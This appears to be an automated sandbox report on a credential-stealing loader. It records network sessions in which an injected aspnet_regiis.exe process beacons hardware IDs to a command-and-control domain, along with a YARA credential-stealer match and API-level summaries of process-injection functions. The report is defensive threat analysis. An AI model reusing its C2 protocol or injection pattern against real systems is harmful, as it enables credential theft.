2024-10-24 19:51:14 UTC	5071	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/
2024-10-24 19:51:15 UTC	1017	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:51:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1m9dvf5lrg85in84hup5h4hd9t; expires=Mon, 17 Feb 2025 13:37:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ihJSHfg%2Bp5F0IbM0L2bQPZ%2BJKjftz4vj5ryr8q5ZIbA9P%2Bwo3tuM%2BvbtiMJCKzZYZdkLZ41dxWrm7tHI%2FTUQ6agujMuiSgJoJXN9IyjQ6Nenq8ayfxYMoJSP%2FQixSojVWfT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c801dc8a06b2d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1088&sent=12&recv=28&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21364&delivery_rate=2581105&cwnd=251&unsent_bytes=0&cid=60dfb33c177305c0&ts=878&x=0"
2024-10-24 19:51:15 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:51:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49720	188.114.96.3	443	7388	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:51:16 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1239 Host: withdrwblon.cyou
2024-10-24 19:51:16 UTC	1239	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 33 42 35 46 43 34 46 46 34 31 39 31 38 44 30 41 45 35 33 44 31 34 44 43 41 45 45 30 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4C3B5FC4FF41918D0AE53D14DCAEE077--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:51:17 UTC	1008	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:51:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0huc838kc6kq6s4m2oogk14t7q; expires=Mon, 17 Feb 2025 13:37:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qdn9o%2BrzMeRL5HFqHsxwiYgU88YJ%2FiW9QbYoS7yYtSQMrNbpIF49%2Bqfby59SvcKqpZgg77fAH4EloNkJ1MnaO1z3awIkgA5mzeXtuE2qazCfgFjzd9qHXlNFLKLm0lJ6goFh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c802b58f9e807-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1320&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2156&delivery_rate=2098550&cwnd=251&unsent_bytes=0&cid=805d1983a4a1a211&ts=516&x=0"
2024-10-24 19:51:17 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:51:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49728	188.114.96.3	443	7388	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:51:18 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1135 Host: withdrwblon.cyou
2024-10-24 19:51:18 UTC	1135	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 43 33 42 35 46 43 34 46 46 34 31 39 31 38 44 30 41 45 35 33 44 31 34 44 43 41 45 45 30 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4C3B5FC4FF41918D0AE53D14DCAEE077--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:51:19 UTC	1008	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:51:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cv6mi24ct1dsa3a5t6mucqg7bm; expires=Mon, 17 Feb 2025 13:37:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7FMbe6eXfACkoIdtnsBys0ig1pva%2B0OFk7TAuArI76AjCoG1pQMXC15vqjfGcia12b%2B3E5FdynpD4Sal7RIv1wZFHE2AbtdkB0dEUchbXQAc2I7%2Fm8JEZoGgoW2CadMsMllM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c80376eea6b3b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1102&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2052&delivery_rate=2513888&cwnd=248&unsent_bytes=0&cid=73413864e17fee0a&ts=714&x=0"
2024-10-24 19:51:19 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:51:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49736	188.114.96.3	443	7388	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:51:20 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 115 Host: withdrwblon.cyou
2024-10-24 19:51:20 UTC	115	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 34 43 33 42 35 46 43 34 46 46 34 31 39 31 38 44 30 41 45 35 33 44 31 34 44 43 41 45 45 30 37 37 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--@qjwo1&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=4C3B5FC4FF41918D0AE53D14DCAEE077
2024-10-24 19:51:20 UTC	1016	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:51:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8g8f383d32sgqq08adhe08k834; expires=Mon, 17 Feb 2025 13:37:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2FpAaKM702mV%2BWg%2FuCEy1wFn%2BWcyqTCDdVddKCsa87hSM3X8%2B3%2BMGR87tNpW6z8agYMAY02IzaXTOR9wdWU2awAMn6FnN4wFGn7upO3OWornb1AzKsLhbwilnky%2BYmd4fFUN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c803f0cc98c56-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1380&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1016&delivery_rate=2045197&cwnd=135&unsent_bytes=0&cid=08c5d07164ec0295&ts=530&x=0"
2024-10-24 19:51:20 UTC	54	IN	Data Raw: 33 30 0d 0a 73 6b 35 58 51 68 37 58 36 79 45 6c 65 5a 6e 61 69 4a 41 68 64 70 58 7a 68 59 30 39 38 67 37 4a 33 59 41 47 4f 79 78 6b 56 30 54 70 45 77 3d 3d 0d 0a Data Ascii: 30sk5XQh7X6yEleZnaiJAhdpXzhY098g7J3YAGOyxkV0TpEw==
2024-10-24 19:51:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	5
Start time:	15:51:04
Start date:	24/10/2024
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0xf00000
File size:	392'704 bytes
MD5 hash:	C92BAAA9C4217759880A0FF0904695D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:51:04
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:51:05
Start date:	24/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x890000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.3%
Total number of Nodes:	1977
Total number of Limit Nodes:	11

Executed Functions

Function 6D7C45A0 Relevance: 86.3, APIs: 20, Strings: 26, Instructions: 5776nativememorythreadCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 6D7C8999
ShowWindow.USER32 ref: 6D7C89AF
VirtualAlloc.KERNELBASE ref: 6D7C8AC5
CreateProcessW.KERNELBASE ref: 6D7C8E08
NtGetContextThread.NTDLL ref: 6D7C908E
NtAllocateVirtualMemory.NTDLL ref: 6D7C9248
NtAllocateVirtualMemory.NTDLL ref: 6D7C9322
NtWriteVirtualMemory.NTDLL ref: 6D7C93DD
NtWriteVirtualMemory.NTDLL ref: 6D7C97B7
NtWriteVirtualMemory.NTDLL ref: 6D7C9987
NtCreateThreadEx.NTDLL ref: 6D7C9AFC
NtSetContextThread.NTDLL ref: 6D7C9B6B
NtResumeThread.NTDLL ref: 6D7C9B83
CloseHandle.KERNEL32 ref: 6D7C9D84
CreateProcessW.KERNEL32 ref: 6D7CA2D8
NtAllocateVirtualMemory.NTDLL ref: 6D7CA374
NtWriteVirtualMemory.NTDLL ref: 6D7CA3BF
NtWriteVirtualMemory.NTDLL ref: 6D7CA431
CloseHandle.KERNEL32 ref: 6D7CA47B

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 6D7C8BC9, 6D7CA24E
}Or, xrefs: 6D7C6974
imeAsFileTime, xrefs: 6D7C53B8, 6D7C9F3C
Q+-U, xrefs: 6D7C7B58
@ga, xrefs: 6D7C75D1
;=, xrefs: 6D7C960F
;>5,, xrefs: 6D7C7EB4
Q+-U, xrefs: 6D7C7BD5
,|!, xrefs: 6D7C7635
&6yi, xrefs: 6D7C8472
?q8O, xrefs: 6D7C9D60
{iJR, xrefs: 6D7C45C0
;>5,, xrefs: 6D7C7E3A
;=, xrefs: 6D7C96EB
MZx, xrefs: 6D7C89EC, 6D7C8A08
ntdll.dll, xrefs: 6D7C89C9
@, xrefs: 6D7CA36C
?q8O, xrefs: 6D7C9DB8
D, xrefs: 6D7C8B13
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 6D7C8CCB, 6D7CA269
Mgq, xrefs: 6D7C895E
c~p~, xrefs: 6D7C9396
kernel32.dll, xrefs: 6D7C89B5
)A@, xrefs: 6D7C6D25
)A@, xrefs: 6D7C6CB0
@ga, xrefs: 6D7C7554

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: Virtual$Memory$Write$Thread$AllocateCreate$CloseContextHandleProcessWindow$AllocConsoleResumeShow
String ID: &6yi$)A@$)A@$;>5,$;>5,$?q8O$?q8O$@$@ga$@ga$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$Mgq$Q+-U$Q+-U$c~p~$imeAsFileTime$kernel32.dll$ntdll.dll${iJR$,|!$}Or$;=$;=
API String ID: 2629464112-488742043
Opcode ID: e050b8e649ac6dd859d82e6d98f5a50c9fdc722d8f76d27633732404846d0ea1
Instruction ID: c57105fd4cb573cd732977f40e938165a8b64e89c13316815e07b22bbcdc51c9
Opcode Fuzzy Hash: e050b8e649ac6dd859d82e6d98f5a50c9fdc722d8f76d27633732404846d0ea1
Instruction Fuzzy Hash: 04A30372A54211CFCB158E7CDE987DA7BF2AB46371F00869AC414EB255C6368E89CF43

Function 6D7BEA30 Relevance: 39.8, APIs: 16, Strings: 6, Instructions: 1338filememoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6D7BF176
CloseHandle.KERNEL32 ref: 6D7BF56C
MapViewOfFile.KERNELBASE ref: 6D7BF6A9
VirtualProtect.KERNELBASE ref: 6D7BFB4C
CloseHandle.KERNEL32 ref: 6D7BFDC8
K32GetModuleInformation.KERNEL32 ref: 6D7BFE32
CloseHandle.KERNEL32 ref: 6D7BFED3
CloseHandle.KERNEL32 ref: 6D7BFEE4

Strings

?hl, xrefs: 6D7BFBCA
Og., xrefs: 6D7BEA97
?hl, xrefs: 6D7BFC38
c:O, xrefs: 6D7BF31F
@, xrefs: 6D7BFA88
c:O, xrefs: 6D7BF29D

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: Handle$Close$Module$FileInformationProtectViewVirtual
String ID: ?hl$?hl$@$Og.$c:O$c:O
API String ID: 2781695713-1186043292
Opcode ID: d4539194323ddd0cf5a3cfa001758eabb46eec4e0c0fe6f45a7670f31cf4a869
Instruction ID: 4ca9d2361d5d6a82a518d18b88b1449f0dd4acf72017d9cdd21d5bc2ad66a7af
Opcode Fuzzy Hash: d4539194323ddd0cf5a3cfa001758eabb46eec4e0c0fe6f45a7670f31cf4a869
Instruction Fuzzy Hash: 69B2AB79A142158FDB04CE7CCA957ADBBF1FB4A320F1081AAE419DB351C7369989CF42

Function 6D7C0A10 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 360
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 6D7C0A2E

Strings

ntdll.dll, xrefs: 6D7C0A25
'~AL, xrefs: 6D7C0EE5
NtQueryInformationProcess, xrefs: 6D7C0A39

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: HandleModule
String ID: '~AL$NtQueryInformationProcess$ntdll.dll
API String ID: 4139908857-2352337104
Opcode ID: efad395a2fa709286f8782fa1e8f468306efc05143fa0e17379cce1b33ea179d
Instruction ID: 59c6fbd65500300c8aaf426c313187618d84a4c1f07ab2f0b7951cb3d2728047
Opcode Fuzzy Hash: efad395a2fa709286f8782fa1e8f468306efc05143fa0e17379cce1b33ea179d
Instruction Fuzzy Hash: 30C1CDB2A652058FCB05CE7DC6947DEBBF1EB46324F10851AE421DB790C7359A4ACB83

Function 6D7DE848 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6D7DE88F
___scrt_uninitialize_crt.LIBCMT ref: 6D7DE8A9

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: fe7ce8dd448b11f736cc67d2d4f22571d67d1547756cebc33df22d2049fccb1c
Instruction ID: a9ec71ded81441fd6ebba1c3aa1ebe767fe095171f4a68bf1a16447ea25a3f47
Opcode Fuzzy Hash: fe7ce8dd448b11f736cc67d2d4f22571d67d1547756cebc33df22d2049fccb1c
Instruction Fuzzy Hash: 9141E472D0A62DAFDBA39F54CA04BBEBA74EB80A74F114026E994D6140C7704D41CBE3

Function 6D7DE8F8 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6D7DE935
dllmain_crt_dispatch.LIBCMT ref: 6D7DE94C
dllmain_raw.LIBCMT ref: 6D7DE994
dllmain_crt_dispatch.LIBCMT ref: 6D7DE9A7
dllmain_raw.LIBCMT ref: 6D7DE9BA

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 1b553db9c42d1b41f745a0f7b77c2289fb49fd49250aa7558d2ef37d0ea1bd95
Instruction ID: b163682a9954201e41e801ff2badfbfa82ba8d9805ed95b5ff7d7b2818729350
Opcode Fuzzy Hash: 1b553db9c42d1b41f745a0f7b77c2289fb49fd49250aa7558d2ef37d0ea1bd95
Instruction Fuzzy Hash: 5B2196B1D0661EAFDBE34E54CA44E7FBA69EB80AB4B014026F958D7210C7708D018BE3

Function 6D7E5F3B Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6D7E5F43

Part of subcall function 6D7E5E98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D7E803F,?,00000000,-00000008), ref: 6D7E5EF9

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D7E5F7B
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D7E5F9B

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 7f52a6e37b237b1b8198ee5ab9dccb6858dced60605eb0f29157c9ea8d478ce5
Instruction ID: e60a14b622fe82f0cba7a5402028de5f42312d49566649a060db18884b6ed36b
Opcode Fuzzy Hash: 7f52a6e37b237b1b8198ee5ab9dccb6858dced60605eb0f29157c9ea8d478ce5
Instruction Fuzzy Hash: D1118EE690D62A7EAB0116756E8DD7FA9ACEE863F97110425F600D5100EB34CD0182B7

Function 6D7DE741 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6D7DE78E

Part of subcall function 6D7DEFB2: InitializeSListHead.KERNEL32(6D846CF8,6D7DE798,6D7F2470,00000010,6D7DE729,?,?,?,6D7DE951,?,00000001,?,?,00000001,?,6D7F24B8), ref: 6D7DEFB7

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D7DE7F8

Memory Dump Source

Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true

Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: c6661d3fbcd7b32770178d34541d70028f3051983780cf5d72e0bf228bf2e394
Instruction ID: 247c318e3654fa8ad4f8a77edb6e5bc1a5b6b177af235c142b669528e6daf159
Opcode Fuzzy Hash: c6661d3fbcd7b32770178d34541d70028f3051983780cf5d72e0bf228bf2e394
Instruction Fuzzy Hash: B421323250D35A9EDB936BB487097BDBBA19F0627DF25042AD6E0EB1C2CB710141C6A3

Function 6D7E6E64 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,6D7E5843,?,?,6D7E5843,00000220,?,00000000,?), ref: 6D7E6E96

Memory Dump Source

